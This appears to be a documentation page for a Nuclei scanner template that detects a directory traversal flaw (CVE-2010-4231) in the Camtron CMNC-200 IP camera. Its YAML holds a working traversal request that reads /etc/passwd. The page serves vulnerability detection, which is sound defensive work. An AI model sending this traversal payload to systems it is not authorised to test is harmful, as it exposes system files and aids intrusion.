Camtron CMNC-200 IP Camera - Directory Traversal
ID: CVE-2010-4231
Severity: high
Author: daffainfo
Tags: cve,cve2010,iot,lfi,camera,edb,camtron
Description
Section titled “Description”The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
YAML Source
Section titled “YAML Source”id: CVE-2010-4231
info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. impact: | An attacker can exploit this vulnerability to access sensitive files and directories on the camera. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt - http://www.exploit-db.com/exploits/15505/ - https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 epss-percentile: 0.87445 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 vendor: camtron product: cmnc-200_firmware tags: cve,cve2010,iot,lfi,camera,edb,camtron
http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100d34bcaa84d7538ff225d82401fc03e50722ce80c5787b7029ea460e6d3c804e8022032c409086552822941d648ca3770d17f048926faa142a85400dd201e71926f2a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-4231.yaml"